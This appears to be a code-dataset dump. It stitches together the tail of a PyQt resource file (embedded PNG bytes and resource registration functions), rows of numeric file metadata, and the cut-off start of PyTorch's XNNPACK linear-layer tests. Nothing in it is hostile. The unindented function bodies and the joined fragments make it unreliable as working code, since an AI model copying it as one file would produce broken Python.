\xc7\x18\xb0\xb30\x9d\xb9\xf7\xf1\xef\xbf\xff\xcc\x90\xfe0$\xe1sz\x8f\xaeP'\x0e03\xfcgd\xe0te`\xe4b`\xf8\xcb\xc0\xc0\x08\xdd\x83t\xe7#\x0b\xf4|{\xc6\x9f\xbf\xff\xa9\x8as\x09q\xb3\xfe\xff\xcf\x00\x00\x00\x00\xff\xffb\x82\xb4\xef-U\xf8!9\xe5\xff\x7f\x06\x0e6\xa6;/\xbf\xddz\xf1\x8d\x81\x11\xa9\x14\xe2\x89e`b\x1e-\x85\x88\x00\xff\x18\x18\xff3\xf0\xc4C8\x90m^\xcf?\xfc\xbc\xfc\xf8\x0b'+\xf4\x0c\x88\xdf\x7f\xff\x99+\xf3300\xfc\xfb\xff\x1f\x00\x00\x00\xff\xff\x82\xee\x113R\xe0\x13\xe4f\xfd\xfd\x17z\xec\xd3\x8f\xdf\xff\x0e\xdf|\xcf\x00\xad\x83\x99\x18\x18\xfe1\xb0\xe92\xb0\x9b@\x8e-\x1e0\xaf\x0d\x01\xc0\xc4\xf0\xff\x1f\x03\x9b\x22\x03\x87=d\xed\x0f\xa4\x07p\xe2\xce\xc7\x0f\xdf\xa0GL\xff\xfb\xff\x9f\x8b\x8d\x19\x12\x01\x8c\x8c\x0c\x00\x00\x00\x00\xff\xffb\x82\xefe5\x94\xe7\xfd\xfe\xeb\x1ft/++\xf3\xc1\x1b\xef\x7f\xfe\xf9\x07\x9d.\x80lM\xe5\xcb`\x18\x1d\x96\xc6\x0f\x18\x99\x18\xfe30\xf0$30\xb2AJ\x0b\xc8!f{\xae\xbeee\x86\xec\xc1f\xf8\xfe\xeb\x9f\xba\x14\xb7\xb28'dK$\x00\x00\x00\xff\xff\x82\xec\x94g```p\xd2\x12\x86\xdc\xd5\x01/\x85\xce\xde\xff\xc4\x089\xc7\x03r\x104w\x04\x03\x9b4\xc3\xbf\x7f\xa3U1\x0e\xc0\xc8\xf0\xff/\x033\x0f\x03o\x1a\x03\x03\x03\x03#t\xd3\xf5\xcd\x17_/>\xfa\xcc\xc5\xce\x0c9\x12\xe2\xd7\x9f\x7f\x0e\x1a\x82\xf0S\x83\x00\x00\x00\x00\xff\xff\x82\xee\x94g``0S\xe2\x17\xe3e\xfd\xf5\xe7\x1f|3*\xe4\x5c\x0f\xc8\xb9g\x0c\x0c\x7f\x18\x189\x18x\xd3\x19\xe0\xb5\xc2(@\x07\xcc\x0c\xff\xfe3\xf0D10\x8bB\xce6\x81T\xab;/\xbd\xfd\xf9\x07\xba5\xec\xef\xbf\xff\xbc\x1c,6j\x82\x0c\xb0\xee\x19\x00\x00\x00\xff\xff\x82\xdey\xf2\xef\xdf\x7fAn\x16k5\x81o\xbf\xfe21A\x0e\xb7a>r\xeb\xc3\x93w?\x98\x18!'\xef230\xfcg\xe0\xcba`\x11f\xf8\xf7w\xb4$\xc2\x00\x90)0v\x06\x81r\x08\xf7\xff\x7f\x06&&\xc6\x8f\xdf\xfe\xec\xbe\xf2\x96\x1br\x04\x0a\x13\xe3\xd7\x9f\x7f\x8d\x14x\xe5E8\xe0c\xfe\x00\x00\x00\x00\xff\xffBI\xcb\xbe\x86bl,L\x90u\x11\xccL\x8c\x9f\xbf\xffYs\xfa%\x03\x03l\xf31\xc3_\x06&A\x06\x9e\xd8\xd1\xaa\x18\x1b`f\xf8\xf7\x8f\x81\xdb\x97\x81E\x09\x92\xfc!\xbb\x1c7_x\xfd\xe2\xe3OV\x16&\xe8\x94\x0b\x03\x83\xaf\xa1\x18\x03\xd2v\x0b\x00\x00\x00\x00\xff\xff\x82\x9d\x17\xc4\xc4\xf8\xff?\x83\xae,\x8f\x81\x1c\xef\xb7_\x7f\xa0'<q\xb0l\xbf\xf8\xe6\xf5\xa7_\x8c\xd0\x13\x9e\x98\x19\x18\xfe1\x08T1\xb0\x8a3\xfc\x1f\xad\x09\x90\x01d\xf4\x8d\x8bA\xb0\x1d2\xfd\x02\xa9`\xbf\xfd\xfa\xbb\xfe\xcc+\xc4\x09d\xbf\xff\xaa\x8asY\xab\x0a\xfcg`\x80_B\x09\x00\x00\x00\xff\xffB>\xb4\xef?\x03\x03\x83\x97\xbe\xc8\xef?\xf0\x13\x9e\x18\xdf~\xf9\xbd\xe5\xc2\x1bF\xa8,#\xc3\xff\x7f\x0c\xcc\xa2\x0c\x02\x95\xb0KaG\x01\x03\x03\x03\x03\x03#3\xc3\xbf\x7f\x0c|Y\x0c\xac*\x90\xc5\xe4\x90\x10\xdfw\xed\xdd\xa3\xb7\xdf!'\x90132~\xff\xf9\xcfUG\x88\x95\x05\xe5\x86\x19\x00\x00\x00\x00\xff\xffB\x04\x22\xe4\x84'{\x0d!9a\x8e\x9f\x7f\xfeA\x9a\xa7\x5c\xec\xcc\x9b\xce\xbd\xfa\xfa\xf3/\xf4\xe8c\xc8a\x1d<)\x0c\xac\xd2\x0c\xff\xfe\x8cf\x02\x06\x06\x06X\xba\xe4a\xe0/b`\xf8\xc7\xc0\xc8\x04\x198\xfe\xfb\xef\xff\xea\x93/\xe1\xa3o\xbf\xff\xfe\x17\xe6e\xf5\xd0\x13e@\xde\x7f\xc7\xc0\x00\x00\x00\x00\xff\xffbB2\x86\xe1\xdf\xbf\xff<\x1c\xcc\x91\x16\x92\xdf`!\xce\xce\xc2\xf4\xf8\xdd\x8f\x95'_\xc0.\x83\x80\xcc\xd4s3\x08O\x81i\x1a\x05L\x0c\xff\xfe1\x08u20KBV\xfa@\x8e\x1c\xdbv\xf1\xcd\xb5\xa7_\xb8\xd8\x98\xff\xfdg`bb\xfc\xfc\xe3O\x80\x91\x98\x04?\xe4\xce\x11\x84f\x00\x00\x00\x00\xff\xffBI\xc2\x90@\xf7\xd0\x17\x96\x11\x82e\x82\x7f\xffy9Y\x96\x1e{\x0e\xbb\x88\xe0?\xf4B'\xee\x00\x06\xde\x18\x86\x7f\x7faw\x0b\x8dX\xc0\xcc\xf0\xef/\x03\xb7\x13\x03_\x16\xc3\xff\xbf\x0c\x0c\xcc\x90\xd2\xff\xfd\xd7\xdf\xb3\xf6?\xe1dg\x86T\xc5\x90\x13\x80\x02M\xc4\xfe\xc3\x1a\xfdp\x00\x00\x00\x00\xff\xffB\x89\x00H2\xe7\xe5`\x091\x13\x87f\x02\xc8\xdd\xb4?\xfeN\xda\xf5\x88\x81\x0163\x0c9\xb5C\xb0\x95\x81\x99\x9f\xe1\xdf\xbf\x11\x9c\x0f \x0dI\x16\x06\xa1^\xe8\xb6H\xd8a\x893\xf6=y\xf1\xf1';\x0b\xd3\x7fX\xf2\xf7\xd6\x17\x91\x14`\x87\x9f\xa0\x08\x07\x00\x00\x00\x00\xff\xffB/\xc4!\x99 \xd8DLI\x94\xeb\xc7\xaf\xbf\x8c\xb0\x8b\x08\x0e\xdex\xb7\xef\xda;&\xe8E\x04L\x0c\x0c\xff\x19X\xe4\x18D\xa73\xfc\xff7r\x9b\xa4\x8c\xcc\x0c\xff\xfe2\x08u2\xb0\x19@\xb6\xa3B\xce\x17\xbe\xf8\xe8\xf3\xa6s\xaf\xf89Y!GD\xfc\xfe\xf3O\x94\x97-\xd6F\x0a\x929\xd0\xcc\x00\x00\x00\x00\xff\xff\xc2X\x9e\xce\xc8\xf0\xff\xff\x7fN6\xe6\x0cg\x99_\xb0e\xa4\x90\xd1\xa1\x99\xfb\x9e|\xff\xf5\x17v\x82\x0a3\x03\xc3\x1f\x06\xeeH\x06\xa1r\x86\x7f\x7f\x18\x18\xd1\xae\x89\x1f\x01\x80\x91\x85\xe1\xef\x1f\x06\xbe8\x06\xfe\x22\xc8\x15\xc4\x90\xad\xbd\xff\xfe\xff\x9f\xba\xe71\xbc\x9a\x85\x9c?\x99h/-\xcc\xc3\xfa\xff?z\xf2g``\x00\x00\x00\x00\xff\xff\xc2\xd2\x8c\x81\x8c\xc79i\x099h\x0a}\x82]D\xc0\xc1\xcat\xef\xd5\xb79\x07\x9e\x22\x1d}\xcc\xcc\xc0\xf0\x97A\xb0\x95\x81\xd3\x9c\xe1\xef\xef\x11V\x1903\xfc\xfb\xc3\xc0\xa6\xcc <\x15~$\x0a\xa4\xaf\xbb\xf2\xc4\xcb\xf3\x0f>q\xb33C\x86\x9a\xbf\xfe\xfck \xcf\x17b*\xf6\xef\xff\x7fFl\x17\xd0\x03\x00\x00\x00\xff\xff\xc2}\x8b\x12\x03C\x96\x8b,7;3\xfc\x0e\x07~.\x96\xa5\xc7\x9e\x1f\xbe\xf9\x1ev#\x0ad\xd0\x88\x89Al5\x03\x9b\xcaHj\x9521\xfc\xff\xcf\xc0,\xc6 \xbe\x81\x81\x89\x87\x81\x81\x81\x81\x81\x11r\xd9\xed\x95'_\xa6\xed}\xcc\xcb\xc9\x02\xbd1\xe6?\x03#\x03C\xae\x9b,\x13l@\x0d\x13\x00\x00\x00\x00\xff\xff\xc2\x1ed\x90\x83,\xe5\x859\xd2\x9dd>}\x83\x9e\xe5\xfd\x9f\x81\x81\x9d\x95\xa9m\xd3\xfd\xe7\x1f~\xc2\xaefbb`\xf8\xc7\xc0\x22\xcb \xb1\x95\x81\x91kd\xccY2B\xfb\xbd\x12\xeb\x18\xd8t\x18\x18\xfe@&\x1d\x19\x19\x19?}\xff\xd3\xb8\xfe\xee\x7f\xd85\xd6,\xcc\x8c\xef\xbf\xfe\x8e\xb2\x92\xd4\x93\xe5\x85\xdd\xba\x83\x05\x00\x00\x00\x00\xff\xff\xc2\x19^\x90d\x1ef&a\xaf)\x88|#\xca\x87o\xbf\x9b\xd6\xdf\xfb\xfd\xf7?l?=3\x03\xc3\x1f\x06V5\x06\xf1\xc5HN\x1c\xae\x80\x91\x81\x81\x89\xe1\xdf_\x06\xd1i\x0c\xec\xd6\x90+\xbc\xfe\xc3Z>\x1d[\xee?|\xf3\x03z\xaf)\x13\xe3\x97\x1f\x7f\xf5\xe4xR\xec\xa5\x91n\x16\xc7\x02\x00\x00\x00\x00\xff\xff\xc2\x97`\x19\x19\x19\x19\x19\x19*|\x14\x05\xb9Y\x7f\xc1nD\xe1\xe5`9u\xffc\xcf\xb6\x07H\x95\x01\x0b\x03\xc3\x1f\x06\xae \x06\xf1\x15\xb0a\xbba\x99\x0f\xe0\xa1?\x99\x817\x13ze/\xec\xca\xaf\xd9\x07\x9e\xec\xbc\xf4\x16r\xc53\xa4K\xcb\xc2\xc4X\xed\xa7\xc4\xceJ\xe0\x8em\x00\x00\x00\x00\xff\xff\xc2\x17R\x90\xcb\xb0\xc4\xf8\xd8J\xbd\x14\xbe\xff\x82\x1e>\xf7\xe7\xdf\x7f!n\xd6ug^\xae9\xf5\x92\x99\x89\x11\xb6\xa7\x8c\x85\x81\xe17\x03w\x18,\x0e\x86\xdfp)\x13,\xf4\xa70\xf0\xe500\xfc\x814:\xfe\xfc\xfb\xcf\xc2\xc4\xb8\xef\xda\xbb\xb9\x07\x9f\x0arC\xaf\x18gbb\xfc\xf8\xfdO\x8e\xab\x9c\x8a8\x17\x9e\xc2\x07\x02\x00\x00\x00\x00\xff\xff\x22\x90T!\x05\x91\xb3\xb6P\x94\x95\xc4\xfb/\xb0Y\xcd\x7f\xff\xf98Xz\xb7?<r\xeb\x03\x0b\xe2\x8a2V\x86\xff\xf08`f\xf8\xff\x17v\xa1\xea0\x00L\x0c\xff\xffA\xd3>_6r\xdagab\xbc\xf2\xe4K\xd3\xfa\xbb\x1c\xac\xcc\xff\xe1\xb7=~\xfb\xed\xa5'\x12f.\x8et\xdb#N\x00\x00\x00\x00\xff\xff\x22\x5cV@Z\xa5\xd9.r\xa6J|\xd0V)\x03\x03\x03#\x03;+S\xcd\x9a\xdbg\xee\x7fB\xe4\x03FV\x06\x86?\x0c\xdca\x0c\xd2\x07\x19X\x95\x18\xfe\xfe\x1d\x0e\xfd\x03F\x16\xe8\x18\xb0\xd4V\xe4\xb4\x0f\x09\xdc\xdb/\xbe\x95\xae\xb8\xf5\xef?\x03\x0b\x13#\xe4\x9a\x8b\xaf\xbf\xfe\xaa\x88q\x95\xf9(b\xedva\x02\x00\x00\x00\x00\xff\xff\x22\x1c\x01\x90\xfd\x1c\xac\xcc\x8c\xf5\x81\xca\xc2<\xac?~C\x96\x0f1\xb001\xfe\xfb\xc7P\xb9\xea\xf6\xcd\xe7_\x91\xf2\x01\x0b\x03\xc3\x1f\x06v+\x06\xc9}\x0c\xec:\x0c\x7f\x7f300\x0f\xe1j\x19\xd2\xdbb\x91c\x90\xdc\xcd\xc0\xe9\x05\xbd8\x13\x16\xfa\xcf>\xfc,]q\xeb\xd3\xb7?\xec\xacL\x7f\xff\xffgbd\xf8\xfd\xf7?\x1b3SC\x902/\x073\xe4\x14\x5c\x82\x00\x00\x00\x00\xff\xff\x22\xaa\xb6\x84\x5c\xbe$)\xc0\xde\x11\xa6\xc6\xcc\xc4\xf0\xe7\xdf?fF\x86\xbf\xff\xff\xb3\xb12\xfd\xf8\xfd\xaf`\xc9\xcd\x0b\x0f?3\xa3\xc5\x01\x8b<\x83\xd4Q\x06\xfe\x14\x86\x7f\x7f\x87f\x95\xc0\xcc\xc0\xc0\xc4\xf0\xf7\x0f\x03O0\x83\xf4)\x066}\xb4Z\xf7\xce\xcbo\xb9\x8bn\xbc\xfe\xf4\x8b\x8b\x9d\xf9\xcf\xbf\xffL\x8c\x0c\xff\xfe3\xfc\xfc\xfd\xaf)X\x19r\xd1/1\xc9\x9f\x81\x81\x01\x00\x00\x00\xff\xff\x22\xb6\xb9\x02\x19\x05\xd2\x95\xe5\xe9\x8eP\xfb\xf7\x8f\xe1\xef?\x06fF\x86\xbf\xff\xfe\xb3\xb32}\xf9\xf9\xb7`\xe9\xcd\x13w>B\xe2\xe0?\x03\x03\x03\x03\x0b\x03\xc3?\x06&>\x06\x91\xd9\x0c\xa2S\x18\x18\xd8\x18\xfe\xfd\x1d:Y\x81\x11:\xc8\xf3\xff\x1f\x83P\x03\x83\xf8\x1a\x06fq\xe8\x95\xbd\xb0\xd0\xbf\xf6\xeck\xee\xa2\x1b/>\xfc\x84\x87>\x03\x03\xc3\xb7\x9f\x7f\x1b\x83\x95m\xd5\x05\x89)\xfa\xe1\x00\x00\x00\x00\xff\xffb\xc4s\xd3*&\x80\x18\xbd\xe7\xea\xbb\xda\xb5\xb79Y\x99\x99\x18\x19\xfe\xfeg`fd\xfc\xf3\xef\xff\xdf\x7f\xffK\xbd\x15\xfc\x0cEa\x97\x06100\xfc\x87\xaen\xffy\x9a\xe1m\x09\xc3\xf7C\x0cL\x90\x22\xf5\xef\xe0\xddp\xc3\xc8\xc2\xf0\xff\x0f\xc3?\x06\x06\x0ec\x06\xa1\x0e\x06N\x17\xc8\xf2BHo\xeb?\xc3\x7f&F\xc6C7\xde7n\xb8\xfb\xfb\xcf\x7fvV&x\xe8\x7f\xfa\xfe\xa7\xcc[1\xd4\x8c\xa8\x8a\x17\x19\x00\x00\x00\x00\xff\xff\x22-\x02\x18`q\xb0\xfb\xca\xdb\xfauw\xd9Y\x99\x98\xa1q\xc0\xf0\xef?\xc3\xd7\x9f\x7fc\xad%\xb3\x5c\xe4 \xedW\xc4u\xcf\x90\xf2\xe7\xd3t\x86we\x0c\x7f\xbf001\xc0nC\x1eT\x80\x99\x81\xe1/\xc3?\x06\x06&V\x06\xc1\x06\x06\x81\x0a\xc8-\x18\xd0q\x1eXgj\xd1\x91g3\xf7=aeada\x82\xce;200|\xfe\xfe\xb7\xc4K>\xcc\x5c\x82\xd4\xd0g``\x00\x00\x00\x00\xff\xff\x229\x02\x18P\xe3\x80\x8d\x85\x89\x85\x89\x11\xe2\x14FF\xc6w_~;h\x08\xd6\x04(\x09q\xb3\x22\xb9\x06\xb2\xfd\x80\x89\xe1\xf7-\x86\x8f}\x0c\x9f\x170\xfc\xfb\xc9\xc0\xc4\x08\xbbzn\xc0s\x033\x03\xc3\x7f\x86\x7f\xff\x18\x98\x18\x19\xb8#\x19\x04J\x19\xd8\x0c\x18\xa0\x17\xf4B\x0f\x1effb\xfc\xfe\xebo\xe7\xd6\x07\x9b\xcf\xbd\x16\xe0\x86\x9ek\x08)\xf7\xbf\xfc ?\xf4\x19\x18\x18\x00\x00\x00\x00\xff\xff\x22'\x02\xe0n:~\xfbC\xd5\xea;\x7f\xfe\xfd\xe7`e\x82\xd4\xc0,\xcc\x8c\x1f\xbf\xfd\x91\x11\xe2\xa8\xf2U4V\xe4\x83g[\x88&hV\xf8u\x99\xe1]\x15\xc3\xb7-\x90s\xd5\x06\xaePb\x84\xa6q\xc8\x94\x12\xa7=\x83P\x1b\x03\xbb\x15\xb2S\xff\xfdg``\xf8\xcf\xc4\xc8x\xf3\xf9\xd7\x96\x8d\xf7n<\xff&\xc0\x05\x1dhcbb\xfc\xf3\xf7\xdf\xaf?\xffk\xfd\x95P/x'\x0d\x00\x00\x00\x00\xff\xff\x223\x02\x18`qp\xe6\xfe\xa7\xea\xd5\xb7?\xff\xf8\xcb\xc3\xce\x0c\xe9\x0d@.\x84\xfb\xff\xff\x7f\x9a\xa3L\x9c\x8d\x14\x03\x03\xc3\xbf\x7f\xff\x19\xa1\xfbd\xff!ZD?O1|\x9c\xc8\xf0u\x15\xc3\xbf?\x0c\x8c\x0c\xb0^\x1b\x1d2\x04#\x03\x03\x13\x03#\x03\xc3\x7fX\xd0s\xfb1\xf0\x171p\xd8C\xbc\x05-\xf1\x19\x18\xfe\xc1\xc2t\xc3\xd9W\x93v=\xfa\xf1\xfb\x1f\xdc\x8f,L\x8c\x90K`\xea\x03\x95\x9d\x10w,\x93\x03\x00\x00\x00\x00\xff\xff\x22?\x02\x18`qp\xf7\xd5\xb7\xfauwo>\xff&\xc0\xc5\x02\xd9f\x03\xc9\x9b\x9f\x7f\xfc1U\xe4\xcfp\x96\xd1\x93\xe5\x85+f``@\x94H\x0c\x0c\x0c\xbf\xae2|\x9e\xcf\xf0e1\xf4h/h\xf5\xc0\x00+\x01\xa8\x08\x98`m\xb0\xbfP\x83\x99\xf9\x19x\x22\x18xS\x18\xd8M`6BGs!#\xfb\x0c\x0c\x0c\xb7_~\x9b\xb9\xef\xc9\xa1\x9b\xef\xb9\xd9\x98\x99\x99\xa1\xcbIX\x98\x18?|\xff##\xc8^\x17\xa8l \xc7KI\xe8300\x00\x00\x00\x00\xff\xff\xa2(\x02\x18`\xc1\xfa\xed\xd7\xdf\xae-\x0f\xb6\x5cx\xcd\xc7\xc9\x02\xef\x10031~\xf9\xf1\x97\x99\x89\xc1\xd7P4\xd5QF\x88\x9b\xf5?\x03\xc3\xff\x7f\xf0;\xcc\x90r\xc3\xdf7\x0c\xdf\xb70|Y\xc6\xf0\xfd\x10\xc3\xbf\x9f\x0c\x0c\xb0A_\x06\x16\xe8jah\x98\x91\xe4TFh\xa0C\x12\xfb\x7f\xd8\xc6g&\x16\x06vK\x06\x9e\x08\x06.\x7f\x06\x16i4\x97@V~012|\xfb\xf9w\xfe\xe1gkN\xbd\xfc\xfe\xeb//'\xcb\xbf\xff\xff!=\xdb\xff\x0c\xff?~\xfbc\xa7!X\xed\xa7$\xcc\xc3Ja\xe8300\x00\x00\x00\x00\xff\xff\xa24\x02\x18\x90Z\x08kN\xbd\x9c\xb2\xe7\xd1\xaf?\xffy8\x98\xa1\x97d12\xfc\xff\xcf\xf0\xf1\xfb\x1f\x19!\x8e\x14{iO}\x11L\xdd(\xdd\xb4\xdfw\x19~\x1ce\xf8\xb6\x99\xe1\xd7Y\x86?\xf7\x11y\x00\x1a\x1fL\xd0\xd2\x03\x02\x90\x1d\x8e\x22\xf8\x8f\x81\xe1\x1fT\xf6?L\x96E\x86\x81\xdd\x90\x81\xcb\x87\x81\xc3\x96\x81U\x13\xa6\xfa/\xd6\xb1\xdbC7\xdf\xcf\xdc\xf7\xe4\xce\xcbo|\x9c,\x90\xdc\xcc\xc0\xc0\xc0\xc8\xc8\xf0\xed\xe7\xdf\xff\xff\x19\x92\xed\xa5\x93\xec\xa5\x91=N\x09\x00\x00\x00\x00\xff\xff\xa2B\x04000\xc0+\xdb\x1b\xcf\xbf\xf6l}p\xee\xe1g\xc8\x95@\x10\xc0\xcc\xc4\xf8\xf3\xcf\xbf\x1f\xbf\xff\x1a\xc9\xf3\x85YH\xd8\xaa\x09\x08r\xa3\x8d\x11\xfd\x87\x9eK\x01\x0f\x8b\xff?\x18~\xdfd\xf8y\x9a\xe1\xc71\x86\xdf7\x18\xfe\xdce\xf8\xfb\x1a\x91\x8a\x09\x02&\x06\x06&a\x06V%\x06Vu\x06v\x0b\x06v\x0b\x06V\x0d\x06&\xf8\xe1U\xffa\xd5,J\xf0}\xf9\xf1\xf7\xf8\x9d\x0f+O\xbe8q\xe7#\x0b3#'+\xf3_\x98\x8d\x903>\xd5%\xb9J<\x15 \x8d\x0b\x06*m\xdb\x05\x00\x00\x00\xff\xff\xa2N\x04@\x00$?\xfe\xfe\xfb\x7f\xc1\xa1\xa7\x8f\xdf\xfd\x80\x1f\x8a\xc0\xf0\x1f:\xb5\xf0\xf5\xe7\xdf\x7f\xff\xff\xabKp{\x1b\x88\x8a\xf1\xb31\xfc\xc7\xf4\xc3?XL\xa0\x0e]\xfc\xfb\xc4\xf0\xf7\x19\xc3\x9fg\x0c\x7f\x9f1\xfcy\xc8\xf0\xf7\x0d\xc3\xff\xef\x0c\xff\xde#\x140\xf110\xf200\x0b2\xb0\xc830K10K2\xb0H\xc3\x0e\xdaA8\x10V\xca\xa3$y\x88\xff?|\xfd\xbd\xed\xe2\x9b\xcbO\xbe0\xfcg\xe0\xe1`\x86\x94\x96\xd0\x810\x06\xc6?\xff\xfe\x0b\xf3\xb0&\xd9I\xf3p0S^\xec \x03\x00\x00\x00\x00\xff\xff\xa2f\x040@o\x85&\xac\xec?\x96\xa0GW\xc2\xc0\xf0\x1f\xba\xdf\x93\xfc1\x8c\xff\x0c\x0c\xff`\x1b\x1a\x18\xf1\x1bB\x84\x93\x18\x18\xa8T\xec \x03\x00\x00\x00\x00\xff\xff\xa2r\x040@<\xfd\x0f\x9f\x99L\x8c\x8c\xa4{\xe1?\x02\xc1\xcdF1\xe5?\xa2\xb8\x87\x865\x81\x10\xc7n\x07\xc6\xa1z\x0c0S\xff\x93\xe9r\x02\x00\x00\x00\x00\xff\xffb\xfc7z5\xe1\x80\x02\x00\x00\x00\x00\xff\xffba\x1c\x1a#\x94\xc3\x16\x00\x00\x00\x00\xff\xffby\xff\xf3\xd3@\xbbaD\x03\x00\x00\x00\x00\xff\xffb\x14\x5c\xe08\xd0n\x18\xd1\x00\x00\x00\x00\xff\xffby\xff\xfd\xdd@\xbbaD\x03\x00\x00\x00\x00\xff\xffbad\x1a\xfa\xf3\xe6C\x19\x00\x00\x00\x00\xff\xffba\x1a\xdd\xea5\xa0\x00\x00\x00\x00\xff\xffb\xf9\xfb\xf3\xe3@\xbbaD\x03\x00\x00\x00\x00\xff\xffb\x5cyw\xf7@\xbbaD\x03\x00\x00\x00\x00\xff\xff\xa2~Ox\x14\x90\x04\x00\x00\x00\x00\xff\xffb\xf93z\x04\xd0\x80\x02\x00\x00\x00\x00\xff\xffba\xfc?Z\x09\x0f$\x00\x00\x00\x00\xff\xff\x1a-\x82\x06\x18\x00\x00\x00\x00\xff\xffb9p\xfd=aU\xa3\x80f\x00\x00\x00\x00\xff\xffb4\xab?1\xd0n\x18\xd1\x00\x00\x00\x00\xff\xffb\xe1\xe3\x1cQ\xbb\x1b\x07\x1d\x00\x00\x00\x00\xff\xff\x82\xed\xe7\x1b\x05\x03\x04\x00\x00\x00\x00\xff\xff\x1am\x02\x0d0\x00\x00\x00\x00\xff\xff\x1a\x8d\x80\x01\x06\x00\x00\x00\x00\xff\xff\x03\x00\x1f\xbf\x8a2{J\xae\xcd\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = b"\x00\x0c\x0f[W\xdc\x00e\x00x\x00a\x00m\x00p\x00l\x00e\x00s\x00.\x00x\x00m\x00l\x00\x09\x04f\x8a\xbc\x00d\x00e\x00m\x00o\x00s\x00.\x00x\x00m\x00l\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x0c\x0a\xf0\xbf'\x00q\x00t\x004\x00-\x00l\x00o\x00g\x00o\x00.\x00p\x00n\x00g\x00\x0b\x05R\xff'\x00r\x00b\x00-\x00l\x00o\x00g\x00o\x00.\x00p\x00n\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x01\x00\x00\x1e\xed\x00\x00\x006\x00\x02\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00f\x00\x00\x00\x00\x00\x01\x00\x00Lj\x00\x00\x00H\x00\x00\x00\x00\x00\x01\x00\x00\x22R"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 3,534.181818
| 76,552
| 0.743531
| 16,738
| 77,752
| 3.446708
| 0.180069
| 0.043265
| 0.039313
| 0.026209
| 0.138583
| 0.092597
| 0.056265
| 0.03836
| 0.015046
| 0.011059
| 0
| 0.239151
| 0.016373
| 77,752
| 21
| 76,553
| 3,702.47619
| 0.515187
| 0.002341
| 0
| 0
| 0
| 0.333333
| 0.995294
| 0.906256
| 0
| 0
| 0.000103
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4e5147172dea913d443fa6dccdf12d6065103d4
| 165
|
py
|
Python
|
first-homework.py
|
FabioniMacaroni/ASTR-119
|
58fc383e2c876dbd1ee2d4b300d50a1d299068a2
|
[
"MIT"
] | null | null | null |
first-homework.py
|
FabioniMacaroni/ASTR-119
|
58fc383e2c876dbd1ee2d4b300d50a1d299068a2
|
[
"MIT"
] | 2
|
2021-09-30T03:39:58.000Z
|
2021-09-30T05:50:39.000Z
|
first-homework.py
|
FabioniMacaroni/ASTR-119
|
58fc383e2c876dbd1ee2d4b300d50a1d299068a2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#this program will write out my full name and preferred pronouns
print("Fabian Arias, he/him/his") #print out Fabian Arias, he/him/his
| 27.5
| 70
| 0.727273
| 28
| 165
| 4.285714
| 0.75
| 0.183333
| 0.216667
| 0.266667
| 0.316667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007299
| 0.169697
| 165
| 5
| 71
| 33
| 0.868613
| 0.715152
| 0
| 0
| 0
| 0
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d4e59d1c55f9a2c045e90d722b955cb1eb80b0ed
| 53,953
|
py
|
Python
|
test/test_xnnpack_integration.py
|
Stonepia/pytorch
|
82006ba46074226a071c25dd2e03dc4828941544
|
[
"Intel"
] | 1
|
2021-06-17T13:02:45.000Z
|
2021-06-17T13:02:45.000Z
|
test/test_xnnpack_integration.py
|
Stonepia/pytorch
|
82006ba46074226a071c25dd2e03dc4828941544
|
[
"Intel"
] | 1
|
2022-01-18T12:17:29.000Z
|
2022-01-18T12:17:29.000Z
|
test/test_xnnpack_integration.py
|
Stonepia/pytorch
|
82006ba46074226a071c25dd2e03dc4828941544
|
[
"Intel"
] | 2
|
2021-07-02T10:18:21.000Z
|
2021-08-18T10:10:28.000Z
|
import unittest
import torch
import torch.backends.xnnpack
from torch.nn import functional as F
from torch.utils.mobile_optimizer import optimize_for_mobile
from torch.testing import FileCheck
import torch.testing._internal.hypothesis_utils as hu
from torch.testing._internal.common_utils import TestCase, run_tests, slowTest
from hypothesis import given, assume
from hypothesis import strategies as st
import io
import itertools
from torch.testing._internal.common_utils import TEST_WITH_TSAN
@unittest.skipUnless(torch.backends.xnnpack.enabled,
" XNNPACK must be enabled for these tests."
" Please build with USE_XNNPACK=1.")
@unittest.skipIf(TEST_WITH_TSAN, "TSAN fails with XNNPACK. Does not seem to have a good reason for failures.")
class TestXNNPACKOps(TestCase):
@given(batch_size=st.integers(0, 3),
data_shape=hu.array_shapes(1, 3, 2, 64),
weight_output_dim=st.integers(2, 64),
use_bias=st.booleans())
def test_linear(self, batch_size, data_shape, weight_output_dim, use_bias):
data_shape = [batch_size] + list(data_shape)
input_data = torch.rand(data_shape)
weight = torch.rand((weight_output_dim, data_shape[-1]))
if use_bias:
bias = torch.rand((weight_output_dim))
else:
bias = None
ref_result = F.linear(input_data, weight, bias)
packed_weight_bias = torch.ops.prepacked.linear_clamp_prepack(weight, bias)
output_linearprepacked = torch.ops.prepacked.linear_clamp_run(input_data, packed_weight_bias)
torch.testing.assert_allclose(ref_result, output_linearprepacked, rtol=1e-2, atol=1e-3)
@given(input_size=st.integers(2, 32),
weight_output_dim=st.integers(2, 64),
use_bias=st.booleans())
def test_linear_1d_input(self, input_size, weight_output_dim, use_bias):
input_data = torch.rand(input_size)
